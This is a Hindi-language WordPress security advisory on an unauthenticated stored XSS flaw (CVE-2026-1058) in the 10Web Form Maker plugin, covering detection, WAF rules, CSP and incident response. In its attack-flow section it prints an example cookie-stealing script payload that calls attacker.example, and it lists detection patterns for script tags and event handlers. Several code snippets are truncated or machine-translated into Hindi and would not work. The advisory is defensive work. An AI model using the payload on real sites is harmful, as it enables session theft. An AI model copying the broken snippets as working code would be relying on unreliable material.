| प्लगइन का नाम | 10Web द्वारा फॉर्म मेकर |
|---|---|
| कमजोरियों का प्रकार | क्रॉस-साइट स्क्रिप्टिंग (XSS) |
| CVE संख्या | CVE-2026-1058 |
| तात्कालिकता | मध्यम |
| CVE प्रकाशन तिथि | 2026-02-08 |
| स्रोत URL | CVE-2026-1058 |
तत्काल सुरक्षा सलाह — 10Web द्वारा फॉर्म मेकर में अप्रमाणित संग्रहीत XSS (≤ 1.15.35)
सारांश: एक संग्रहीत, अप्रमाणित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता (CVE-2026-1058) 10Web प्लगइन के फॉर्म मेकर संस्करणों ≤ 1.15.35 को प्रभावित करती है। विक्रेता ने समस्या को हल करने के लिए 1.15.36 जारी किया। यह सलाह पहचान, शमन, और सुधार के कदम प्रदान करती है — साथ ही तत्काल वर्चुअल पैचिंग मार्गदर्शन जो आप WAF या समकक्ष एज फ़िल्टर के माध्यम से लागू कर सकते हैं।.
कार्यकारी सारांश
6 फरवरी 2026 को 10Web वर्डप्रेस प्लगइन (CVE-2026-1058) में एक संग्रहीत XSS भेद्यता का खुलासा किया गया। 1.15.35 तक और इसमें शामिल संस्करण प्रभावित हैं। विक्रेता ने दोष को हल करने के लिए संस्करण 1.15.36 जारी किया।.
- भेद्यता प्रकार: संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)
- प्रभावित संस्करण: ≤ 1.15.35
- ठीक किया गया: 1.15.36
- CVE: CVE-2026-1058
- CVSS आधार स्कोर (उदाहरण): 7.1 (मध्यम/उच्च संदर्भ के आधार पर)
- हमले का वेक्टर: अप्रमाणित, संग्रहीत
- प्रभाव: सत्र चोरी, विशेषाधिकार वृद्धि (यदि पेलोड प्रशासक संदर्भ में निष्पादित होता है), मनमाना JavaScript निष्पादन, अनधिकृत क्रियाएँ
चूंकि भेद्यता अप्रमाणित है और संग्रहीत सामग्री शामिल है, इसे प्रशासकों, सामग्री संपादकों, या साइट आगंतुकों को प्रभावित करने के लिए हथियारबंद किया जा सकता है, जो रेंडरिंग संदर्भ पर निर्भर करता है। फॉर्म मेकर का उपयोग करने वाले किसी भी उत्पादन या स्टेजिंग साइट को सुधार के लिए उच्च प्राथमिकता के रूप में मानें।.
यह भेद्यता कैसे काम करती है (तकनीकी अवलोकन)
प्लगइन ने उचित सफाई/एस्केपिंग के बिना फॉर्म-प्रस्तुत डेटा (छिपे हुए फ़ील्ड सहित) को स्वीकार किया और उसे बनाए रखा, इससे पहले कि इसे प्रशासक या फ्रंटेंड दृश्य में रेंडर किया जाए। जब वह संग्रहीत सामग्री बिना एस्केप किए प्रदर्शित होती है, तो एक JavaScript पेलोड दर्शक के ब्राउज़र में निष्पादित होता है।.
सामान्य हमले का प्रवाह:
- हमलावर एक फॉर्म प्रस्तुत करता है जिसमें एक छिपे हुए फ़ील्ड का मान होता है जिसमें एक JavaScript पेलोड होता है (उदाहरण एस्केप किया गया):
<script>new Image().src='https://attacker.example/steal?c='+document.cookie;</script>
- प्लगइन पेलोड को सबमिशन के साथ डेटाबेस में संग्रहीत करता है।.
- जब एक प्रशासक या अन्य उपयोगकर्ता सबमिशन सूची, पूर्वावलोकन, या कोई भी विवरण दृश्य खोलता है जो संग्रहीत छिपे हुए फ़ील्ड के मान को बिना एस्केप किए रेंडर करता है, तो पेलोड उपयोगकर्ता के ब्राउज़र संदर्भ में निष्पादित होता है।.
- परिणामों में सत्र कुकी चोरी, प्रशासक सत्रों के तहत CSRF-शैली की क्रियाएँ, स्थायी दुर्भावनापूर्ण सामग्री का समावेश, या पूर्ण साइट समझौते के लिए पिवटिंग शामिल हैं।.
चूंकि फॉर्म प्रस्तुत करने के लिए कोई प्रमाणीकरण आवश्यक नहीं है, एक हमलावर पैमाने पर पेलोड इंजेक्ट कर सकता है और निष्पादन को ट्रिगर करने के लिए वैध दृश्य का इंतजार कर सकता है।.
वास्तविक शोषण परिदृश्य
- सामाजिक इंजीनियरिंग: कई दुर्भावनापूर्ण सबमिशन के बाद एक लक्षित फ़िशिंग संदेश एक व्यवस्थापक को सबमिशन सूची में लाने के लिए।.
- स्वचालित सामूहिक हमला: बॉटनेट प्लगइन वाले साइटों को स्कैन करते हैं, सार्वजनिक फ़ॉर्म की गणना करते हैं, और छिपे हुए फ़ील्ड में सामूहिक रूप से पेलोड इंजेक्ट करते हैं।.
- सार्वजनिक पोस्ट: यदि सबमिशन सार्वजनिक रूप से प्रदर्शित होते हैं (गवाही, समीक्षाएँ), तो कोई भी आगंतुक संग्रहीत पेलोड को सक्रिय कर सकता है।.
सबसे गंभीर परिणाम व्यवस्थापक संदर्भ में पेलोड निष्पादन है - इससे खाता अधिग्रहण, बैकडोर का निर्माण, या थीम/प्लगइन्स में संशोधन सक्षम हो सकता है।.
समझौते के संकेत (IoCs) की तलाश करें
अपने साइट और डेटाबेस में इंजेक्टेड स्क्रिप्ट या संदिग्ध सामग्री के लिए खोजें। इन स्थानों से शुरू करें:
- डेटाबेस फ़ील्ड और प्लगइन तालिकाएँ जो सबमिशन को संग्रहीत करती हैं
- wp_posts, wp_postmeta, wp_comments, wp_options किसी भी संग्रहीत HTML के लिए जिसमें टैग शामिल हैं
- अपलोड निर्देशिका (हमलावर कभी-कभी XSS को फ़ाइल अपलोड के साथ मिलाते हैं)
उपयोगी पहचान प्रश्न और आदेश
MySQL / SQL (प्रत्यक्ष संपादनों से पहले बैकअप):
-- <script के साथ किसी भी सामग्री को खोजें;
पोस्टमेटा में स्क्रिप्ट टैग के लिए खोजें (JSON संग्रहीत करने वाले प्लगइन्स के लिए सामान्य):
WP-CLI त्वरित स्कैन'
wp search-replace '<script' '' --dry-run सर्वर पर Grep
(Linux):
grep -R --line-number --exclude-dir=wp-content/uploads '<script' /var/www/html
grep 'attacker.example' /var/log/apache2/access.log
अज्ञात खातों के लिए प्रशासन सत्रों, हाल के लॉगिन, wp_users और wp_usermeta की भी जांच करें, और निर्धारित कार्यों या फ़ाइल प्रणाली में किसी भी अप्रत्याशित परिवर्तनों की जांच करें।.
तात्कालिक समाधान - अभी क्या करें (चरण-दर-चरण)
निम्नलिखित चरण गति और कम घर्षण के लिए क्रमबद्ध हैं। दीर्घकालिक समाधान की तैयारी करते समय सबसे तेज़ समाधान पहले लागू करें।.
- तुरंत प्लगइन को 1.15.36 पर अपडेट करें।. यह विक्रेता से अंतिम समाधान है।.
- यदि आप तुरंत अपडेट नहीं कर सकते हैं, तो वर्चुअल पैचिंग / एज फ़िल्टरिंग सक्षम करें।. अपडेट शेड्यूल करते समय इस कमजोरियों को लक्षित करने वाले सामान्य शोषण पैटर्न को रोकने के लिए एक वेब एप्लिकेशन फ़ायरवॉल (WAF) या एज फ़िल्टरिंग का उपयोग करें।.
- सबमिशन दृश्य तक पहुंच को प्रतिबंधित करें।. विश्वसनीय IPs (सर्वर कॉन्फ़िगरेशन, .htaccess, या होस्ट नियंत्रण) के लिए प्रशासन सबमिशन पृष्ठों तक पहुंच को सीमित करें। यदि संभव हो तो संग्रहीत सबमिशनों को प्रदर्शित करने वाले सार्वजनिक पृष्ठों को अस्थायी रूप से अक्षम करें।.
- फ़ॉर्म एंडपॉइंट्स को मजबूत करें।. CAPTCHA, दर सीमाएँ जोड़ें, और फ़ॉर्म POST एंडपॉइंट्स पर स्पष्ट रूप से खराब उपयोगकर्ता एजेंटों या संदिग्ध रेफरर्स को ब्लॉक करें।.
- डेटाबेस को स्कैन और साफ करें।. संग्रहीत डेटा में , onerror=, javascript:, data:text/html के लिए खोजें और निष्क्रिय करें या विश्लेषण के लिए निर्यात करें। बिना समीक्षा के अंधाधुंध न हटाएं।.
- सत्रों को रीसेट करें और क्रेडेंशियल्स को घुमाएँ।. प्रशासकों के लिए पासवर्ड रीसेट करने के लिए मजबूर करें, सक्रिय सत्रों को अमान्य करें, और API कुंजियों और रहस्यों को घुमाएँ।.
- शोषण प्रयासों के लिए लॉग की निगरानी करें।. स्क्रिप्ट मार्करों या एन्कोडेड पेलोड्स वाले फ़ॉर्म एंडपॉइंट्स पर POST के लिए देखें।.
- यदि आप सक्रिय शोषण का पता लगाते हैं, तो साइट को अलग करें।. यदि समझौता होने का संदेह है तो साइट को रखरखाव मोड में डालें और जांच के लिए इसे ऑफ़लाइन ले जाएं।.
नमूना WAF / वर्चुअल पैचिंग नियम (तुरंत लागू करें)
नीचे उदाहरण नियम और पहचान तर्क दिए गए हैं जिन्हें आप WAF या एज फ़िल्टर में लागू कर सकते हैं। एक स्टेजिंग वातावरण में परीक्षण करें और झूठे सकारात्मक को कम करने के लिए ट्यून करें।.
- छिपे हुए फ़ील्ड मानों के साथ POST को ब्लॉक करें जिसमें स्क्रिप्ट या इवेंट हैंडलर शामिल हैं
- मेल खाता है यदि विधि == POST और अनुरोध शरीर में शामिल है
9. या विशेषताओं जैसे onload=,जावास्क्रिप्ट:,त्रुटि होने पर=,11. साइट मालिकों के लिए तात्कालिक कदम,onmouseover=. - जहां संभव हो, ज्ञात फ़ॉर्म सबमिशन एंडपॉइंट्स तक सीमित करें (जैसे, admin-ajax हैंडलर या प्लगइन-विशिष्ट एंडपॉइंट)।.
- मेल खाता है यदि विधि == POST और अनुरोध शरीर में शामिल है
- एन्कोडेड पेलोड का पता लगाएं
- URL-कोडित अनुक्रमों के लिए स्कैन करें जैसे
%3Cscript%3Eया फ़ॉर्म फ़ील्ड में बेस64-कोडित स्क्रिप्ट फ़्रैगमेंट।.
- URL-कोडित अनुक्रमों के लिए स्कैन करें जैसे
- बार-बार सबमिशन पर दर-सीमा लगाएं
- उन IPs को ब्लॉक करें या चुनौती दें जो प्रति मिनट एक उचित सबमिशन थ्रेशोल्ड को पार करते हैं।.
- उदाहरण ModSecurity-शैली का नियम (चित्रात्मक - पहले परीक्षण करें):
SecRule REQUEST_METHOD "POST" "chain,deny,log,status:403,msg:'Form Maker XSS सुरक्षा - संदिग्ध पेलोड को ब्लॉक किया'"
अतिरिक्त उपाय:
- संदिग्ध क्वेरी पैरामीटर या कोडित स्क्रिप्ट पैटर्न वाले प्रशासन UI के लिए सार्वजनिक GET अनुरोधों को ब्लॉक करें।.
- इंजेक्टेड स्क्रिप्ट्स के निष्पादन को सीमित करने के लिए एक सख्त कंटेंट-सिक्योरिटी-पॉलिसी (CSP) पर विचार करें (गहराई में रक्षा, पैच के लिए प्रतिस्थापन नहीं)।.
उदाहरण CSP हेडर (अपने वातावरण के अनुसार समायोजित करें):
सामग्री-सुरक्षा-नीति: डिफ़ॉल्ट-स्रोत 'स्वयं'; स्क्रिप्ट-स्रोत 'स्वयं'; ऑब्जेक्ट-स्रोत 'कोई नहीं'; आधार-यूआरआई 'स्वयं';
डेवलपर मार्गदर्शन - कोड को सुरक्षित रूप से कैसे ठीक करें
यदि आप ऐसे इंटीग्रेशन या टेम्पलेट्स को बनाए रखते हैं जो प्लगइन-सहेजे गए फ़ॉर्म डेटा को रेंडर करते हैं, तो सभी आउटपुट पथों को मजबूत करें:
- इनपुट पर साफ करें।. सर्वर-साइड मान्यता: प्रकार, लंबाई और वर्ण सेट लागू करें। जहां अपेक्षित नहीं है, HTML को अस्वीकार करें या हटा दें।.
- आउटपुट पर एस्केप करें।. उपयुक्त एस्केपिंग फ़ंक्शंस का उपयोग करें:
- HTML बॉडी: उपयोग करें
esc_html() - विशेषताएँ: उपयोग करें
esc_attr() - URLs: उपयोग करें
esc_url() - जावास्क्रिप्ट संदर्भ: उपयोग करें
wp_json_encode()या उचित JS एस्केपिंग
- HTML बॉडी: उपयोग करें
- अविश्वसनीय HTML को संग्रहीत करने से बचें।. यदि एक फ़ील्ड सामान्य पाठ है, तो इसे केवल सामान्य पाठ के रूप में संग्रहीत और प्रदर्शित करें।.
- तैयार किए गए बयानों का उपयोग करें।. उपयोग करें
$wpdb->prepare()या संयोजन के बजाय पैरामीटरयुक्त प्रश्न।. - आवश्यकतानुसार HTML को व्हाइटलिस्ट करें।. उपयोग करें
wp_kses()यदि सीमित HTML की आवश्यकता है तो एक संकीर्ण टैग/विशेषता व्हाइटलिस्ट के साथ।. - व्यवस्थापक दृश्य की समीक्षा करें।. सुनिश्चित करें कि प्लगइन व्यवस्थापक पृष्ठ आउटपुट को एस्केप करते हैं; किसी भी स्थान को पैच करें जहां अनएस्केप्ड आउटपुट इको किया गया है।.
उदाहरण रक्षात्मक लपेटन:
function safe_render_submission_value( $value ) {
यदि आप समझौते का संदेह करते हैं तो फोरेंसिक चेकलिस्ट
यदि पहचान संभावित शोषण का खुलासा करती है, तो एक मानक घटना प्रतिक्रिया प्रवाह का पालन करें:
- शामिल करें: साइट को रखरखाव मोड में डालें; आभासी पैच लागू करें और दोषपूर्ण प्लगइन को निष्क्रिय करें।.
- सबूत को संरक्षित करें: साइट और डेटाबेस का पूरा बैकअप/इमेज लें; प्रासंगिक लॉग्स को निर्यात करें।.
- दायरा पहचानें: वेबशेल, अपरिचित PHP फ़ाइलें, नए व्यवस्थापक उपयोगकर्ता, संशोधित कोर/प्लगइन/थीम फ़ाइलें, और संदिग्ध क्रोन प्रविष्टियों की खोज करें।.
- समाप्त करें: दुर्भावनापूर्ण कोड और बैकडोर को हटा दें; संशोधित फ़ाइलों को विश्वसनीय प्रतियों से बदलें; प्रभावित डेटाबेस प्रविष्टियों को साफ करें।.
- पुनर्प्राप्त करें: सभी सॉफ़्टवेयर को नवीनतम संस्करणों में अपडेट करें; क्रेडेंशियल्स को घुमाएँ; सेवाओं को फिर से कनेक्ट करें।.
- सीखे गए पाठ: दस्तावेज़ मूल कारण और नियंत्रणों को दस्तावेजित करें; सुधार लागू करें (WAF, CSP, निगरानी)।.
यदि आपके पास आंतरिक घटना प्रतिक्रिया विशेषज्ञता की कमी है, तो योग्य सुरक्षा पेशेवरों को शामिल करें - पूर्ण सफाई की लागत आमतौर पर त्वरित सुधार से बहुत अधिक होती है।.
पहचान और निगरानी सिफारिशें
- सुनिश्चित करें कि WAF और एज फ़िल्टर लॉग को बनाए रखा जाए और प्रारंभिक प्रतिक्रिया के दौरान दैनिक समीक्षा की जाए।.
- फ़ॉर्म एंडपॉइंट्स पर दोहराए गए POST के लिए वेब सर्वर लॉग की निगरानी करें और एन्कोडेड स्क्रिप्ट मार्करों के लिए।.
- खाता निर्माण और प्लगइन/थीम परिवर्तनों के लिए व्यवस्थापक गतिविधि और ऑडिट लॉगिंग सक्षम करें।.
- wp-content के तहत नए या संशोधित PHP फ़ाइलों का पता लगाने के लिए फ़ाइल अखंडता निगरानी का उपयोग करें।.
- समय-समय पर कमजोरियों के स्कैन की योजना बनाएं और निष्कर्षों को तुरंत संबोधित करें।.
आपको पैच करने के लिए इंतजार क्यों नहीं करना चाहिए
- अप्रमाणित संग्रहीत XSS हमलावरों के लिए सस्ता है और स्वचालित करना आसान है।.
- संग्रहीत पेलोड समय के साथ कई वैध उपयोगकर्ताओं को प्रभावित कर सकते हैं।.
- व्यवस्थापक संदर्भ में निष्पादन साइट पर कब्जा करने के लिए तेजी से बदलाव की अनुमति देता है।.
- स्वचालित स्कैनर और बॉट्स ज्ञात प्लगइन कमजोरियों को खुलासे के घंटों या दिनों के भीतर हथियार बनाते हैं।.
अपडेट में देरी करने से आपकी साइट उजागर रहती है। यदि आप तुरंत अपडेट नहीं कर सकते हैं, तो बिना देरी के आभासी पैचिंग और पहुंच प्रतिबंध लागू करें।.
नमूना पहचान हस्ताक्षर (सुरक्षा टीमों के लिए)
लॉग या डेटाबेस डंप में शिकार करने के लिए इन regex पैटर्न का उपयोग करें। अपने वातावरण में शोर के लिए ट्यून करें।.
<script\b[^>]*>(.*?)</script>(?i)ऑन\w+\s*=\s*["']?[^"'>]+["']?(इवेंट हैंडलर्स)(?i)जावास्क्रिप्ट:(जावास्क्रिप्ट: URLs)(?i)डेटा:text/html(डेटा यूआरएल)- एन्कोडेड पैटर्न:
%3Cscript%3E,\\x3cस्क्रिप्ट\\x3e,eval\(,दस्तावेज़\.कुकी,नया इमेज\(
उदाहरण खोज:
SELECT * FROM wp_postmeta WHERE meta_value REGEXP '<script|javascript:|onerror|onload';
WAF और वर्चुअल पैचिंग कैसे मदद करते हैं — व्यावहारिक लाभ
WAF या समकक्ष एज फ़िल्टर को लागू करने से कई तात्कालिक लाभ मिलते हैं जबकि आप विक्रेता पैच तैयार करते हैं या लागू करते हैं:
- ज्ञात XSS पेलोड पैटर्न से मेल खाने वाले शोषण ट्रैफ़िक को ब्लॉक करें।.
- उच्च मात्रा वाले स्वचालित सबमिशन के लिए दर-सीमा और चुनौती।.
- फोरेंसिक विश्लेषण के लिए प्रयास किए गए शोषण का पता लगाएं और लॉग करें।.
- जब आप प्लगइन को अपडेट करते हैं तो अस्थायी वर्चुअल पैचिंग प्रदान करें।.
कई साइटों का प्रबंधन करने वाले संगठनों के लिए, सक्षम एज फ़िल्टर या WAF के माध्यम से केंद्रीकृत नियम आवेदन आपातकालीन शमन के समन्वय को सरल बनाता है।.
हार्डनिंग चेकलिस्ट (क्रियाशील सारांश)
- फॉर्म मेकर को 1.15.36 पर अपडेट करें (या अपडेट होने तक प्लगइन हटा दें)।.
- ज्ञात शोषण पैटर्न को ब्लॉक करने के लिए WAF / वर्चुअल पैचिंग सक्षम करें।.
- "<script" और संदिग्ध पेलोड के लिए डेटाबेस और फ़ाइल सिस्टम खोजें; यदि पाया जाए तो साफ करें।.
- व्यवस्थापक पासवर्ड रीसेट करें और सत्रों को अमान्य करें।.
- प्रशासन UI और संवेदनशील पृष्ठों तक पहुंच को प्रतिबंधित करें (जहां व्यावहारिक हो, IP व्हाइटलिस्टिंग)।.
- फ़ॉर्म एंडपॉइंट्स पर CAPTCHA और दर सीमाएँ जोड़ें।.
- XSS प्रभाव को कम करने के लिए CSP लागू करें।.
- लॉग की निगरानी करें और संदिग्ध POSTs और नए प्रशासनिक उपयोगकर्ताओं पर अलर्ट करें।.
- अनधिकृत परिवर्तनों का पता लगाने के लिए फ़ाइल अखंडता निगरानी का उपयोग करें।.
- यदि समझौता किया गया है, तो घटना प्रतिक्रिया चेकलिस्ट का पालन करें (नियंत्रित करें, संरक्षित करें, समाप्त करें, पुनर्प्राप्त करें, सीखें)।.
उदाहरण शमन समयरेखा (अनुशंसित)
- 1 घंटे के भीतर: WAF नियम सक्षम करें, दर सीमाएँ लागू करें, और यदि शोषण का संदेह है तो रखरखाव मोड पर विचार करें।.
- 4 घंटे के भीतर: प्लगइन को 1.15.36 पर अपडेट करें या प्लगइन को हटा दें; स्पष्ट पेलोड के लिए DB को स्कैन करें।.
- 24 घंटे के भीतर: प्रशासनिक क्रेडेंशियल्स को घुमाएँ, सत्रों को अमान्य करें, और गहरे समझौते की खोज करें।.
- 72 घंटे के भीतर: यदि आवश्यक हो तो साफ़ बैकअप से पुनर्स्थापित करें; साइट को फिर से सक्षम करें; निगरानी जारी रखें।.
फ़ॉर्म मेकर के साथ एकीकरण बनाए रखने वाले डेवलपर्स के लिए एक संक्षिप्त नोट।
फ़ॉर्म मेकर से डेटा रेंडर करने वाले प्रत्येक आउटपुट पथ का ऑडिट करें। संग्रहीत XSS लगभग हमेशा रेंडर पर बचाने में विफलता का परिणाम होता है। प्लगइन के पैच होने के बाद भी, बिना बचाए संग्रहीत डेटा को रेंडर करने वाले एकीकरण कमजोर रहते हैं।.
हमेशा:
- उपयोग करें
esc_html(),esc_attr(),esc_url()डेटा प्रिंट करते समय।. - सहेजने से पहले इनपुट को सख्ती से मान्य करें।.
- तैयार बयानों का उपयोग करें और जब तक स्पष्ट रूप से आवश्यक न हो और उचित रूप से व्हाइटलिस्ट न किया गया हो, अस्वच्छ HTML को संग्रहीत करने से बचें।.
यदि आपके पास कोड की समीक्षा करने की इन-हाउस क्षमता नहीं है, तो लक्षित XSS समीक्षा करने के लिए अनुभवी सुरक्षा ऑडिटर्स को शामिल करें।.
समापन विचार
बिना प्रमाणीकरण वाले, संग्रहीत XSS कमजोरियाँ WordPress साइटों के लिए उच्च परिचालन जोखिम प्रस्तुत करती हैं: इन्हें बड़े पैमाने पर हथियार बनाने में आसान है और प्रशासनिक अधिग्रहण प्राप्त करने के लिए उपयोग किया जा सकता है। 10Web द्वारा फ़ॉर्म मेकर में यह समस्या (CVE‑2026‑1058) को तुरंत गंभीरता से लिया जाना चाहिए - अब 1.15.36 पर अपडेट करें या सुधार करते समय आभासी पैचिंग और पहुंच प्रतिबंध लागू करें।.
यदि आपको WAF नियम लिखने, समझौते के संकेतों के लिए स्कैन करने, या पोस्ट-रिमेडिएशन समीक्षा करने में सहायता की आवश्यकता है, तो योग्य सुरक्षा पेशेवरों को तुरंत शामिल करें। संदिग्ध स्क्रिप्ट की किसी भी खोज को संभावित समझौते के रूप में मानें और ऊपर वर्णित नियंत्रण और फोरेंसिक कदमों का पालन करें।.
— हांगकांग सुरक्षा विशेषज्ञ